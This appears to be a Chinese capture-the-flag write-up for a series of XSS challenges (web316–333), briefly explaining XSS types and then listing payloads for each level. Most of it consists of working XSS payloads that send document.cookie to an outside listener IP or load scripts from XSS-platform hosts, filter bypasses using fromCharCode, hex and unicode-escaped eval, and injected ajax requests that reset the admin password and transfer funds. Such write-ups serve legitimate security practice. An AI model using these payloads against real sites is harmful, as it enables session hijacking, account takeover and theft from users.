前言
记录web的题目wp,慢慢变强,铸剑。
XSS
web316
什么是xss?
1、跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。
2、通过 document.cookie 盗取 cookie中的信息
使用 js或 css破坏页面正常的结构与样式
流量劫持(通过访问某段具有 window.location.href 定位到其他页面)
dos攻击:利用合理的客户端请求来占用过多的服务器资源,从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码,从而拒绝合理的请求服务。
利用 iframe、frame、XMLHttpRequest或上述 Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作,并且攻击者还可以利用 iframe,frame进一步的进行 CSRF 攻击。
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。XSS的分类
1、 反射型:
一般来说这种类型的XSS,需要攻击者提前构造一个恶意链接,来诱使客户点击,比如这样的一段链接:www.abc.com/?params=`x`2、存储型:
这种类型的XSS,危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码,并且服务器没有正确进行过滤输出,那就会造成浏览这个页面的用户执行这段JavaScript代码。3、DOM型:
这种类型则是利用非法输入来闭合对应的html标签。
比如,有这样的一个a标签:
乍看问题不大,可是当$var的内容变为 ’ οnclick=’alert(/xss/) //,这段代码就会被执行。
先找一个xs平台来进行中介,xss平台导航注册一个号,然后点击创建项目,名字随意,默认模块,随便一个代码
在输入框提交就可以拿到flag了
xss平台刷新一下
- 但是如果你有服务器就会简单很多,直接在服务器上
python -m http.server 39543监听这个端口
1 | <script>location.href="http://ip:39543/"+document.cookie</script> |
web317
- 过滤了script,用img代码
1 | <img src='' onerror=location.href='http://118.195.161.220:39543/'+document.cookie> |
web318
- 过滤img,用xss平台的实体十六进制编码
1 | <iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/eKcZ"></sCrIpT>> |
- 继续用服务器抓iframe
1 | <iframe onload=document.location='http://118.195.161.220:39543/?cookie='+document.cookie> |
web319
- iframe继续撸,不过换种写法
1 | <iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)> |
web320
- 过滤了空格可以换%09制表符或者/来代替
可以利用String.fromCharCode来进行转换
1 | <body/onload=document.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,47,47,120,115,46,115,98,47,49,66,113,117,62,60,47,115,67,114,73,112,84,62));> |
- iframe没过滤继续用,用/来代替空格
1 | <iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)> |
web321
- 过滤了逗号,我换了个10进制实体
1 | <iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>> |
- 或者换一种,用String.fromCharCode拼接
<script>alert(1)</script>
1 | document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));document.write(String.fromCharCode(97));document.write(String.fromCharCode(108));document.write(String.fromCharCode(101));document.write(String.fromCharCode(114));document.write(String.fromCharCode(116));document.write(String.fromCharCode(40));document.write(String.fromCharCode(49));document.write(String.fromCharCode(41));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62)); |
写一个脚本跑
1 | # -- coding:UTF-8 -- |
1 | <body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));> |
- 服务器payload,继续iframe
1 | <iframe/onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)> |
web322
- 还是转实体
1 | <iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>> |
- 或者上面那个方法
1 | <body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));> |
- 服务器形式,和上题一样
web323
- 过滤iframe
1 | <body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));> |
- 过滤了iframe那就换svg
1 | <svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)> |
web324
1 | <body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));> |
服务器
1 | <svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)> |
web325
服务器
1 | <svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)> |
好像上个用不了了,那就把转换成native编码或者js转义的base 16进制编码,我写了两种
js转义的base 16进制编码 注意:简单方法,先转换为URL编码然后文本编辑器替换%为\x
1 | eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x36\x30\x2C\x31\x31\x35\x2C\x36\x37\x2C\x38\x32\x2C\x31\x30\x35\x2C\x38\x30\x2C\x31\x31\x36\x2C\x33\x32\x2C\x31\x31\x35\x2C\x38\x32\x2C\x36\x37\x2C\x36\x31\x2C\x34\x37\x2C\x34\x37\x2C\x31\x32\x30\x2C\x31\x31\x35\x2C\x34\x36\x2C\x31\x31\x35\x2C\x39\x38\x2C\x34\x37\x2C\x34\x39\x2C\x36\x36\x2C\x31\x31\x33\x2C\x31\x31\x37\x2C\x36\x32\x2C\x36\x30\x2C\x34\x37\x2C\x31\x31\x35\x2C\x36\x37\x2C\x31\x31\x34\x2C\x37\x33\x2C\x31\x31\x32\x2C\x38\x34\x2C\x36\x32\x29\x29\x3B") |
还有native编码
1 | eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B") |
paylaod
1 | <body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")> |
web326
服务器
1 | <svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)> |
xss平台
1 | <body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")> |
web327
收件人为admin,这次换个写法
1 | <body onload=window.open('http://118.195.161.220:39543/'+document.cookie)> |
web328
继续服务器监听
1 | <script>window.open('http://118.195.161.220:39543/'+document.cookie)</script> |
浏览器console一键设置cookie
1 | var cookiestr="你的打到的cookie内容";var arr = cookiestr.split(";"); |
web329
- 这次cookie不持久,所以就直接获取页面信息,通过document来获取
1 | <script>window.open('http://118.195.161.220:39543/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script> |
web330
- 多了个修改密码功能
1 | <script>window.open('http://127.0.0.1/api/change.php?p=123456')</script> |
admin 123456登陆
web331
- 换成了post请求,用ajax发送请求
1 | <script>$.ajax({url:"api/change.php",method:"POST",data:{'p':'1234567'}})</script> |
web332
1 | <script>$.ajax({url: "http://127.0.0.1/api/amount.php",method: "POST",data: {'u'='gylq','a':10000},cache: false,success: function(res){}});</script> |
向admin转-10000
web333
- burp抓包跑一波,为了练习一下python,写个脚本跑,两个,非预期和预期解
1 | # -- coding:UTF-8 -- |
1 | <script>$.ajax({url:'api/amount.php',type:'POST',data:{'u':'gylq','a':'10000'}})</script> |
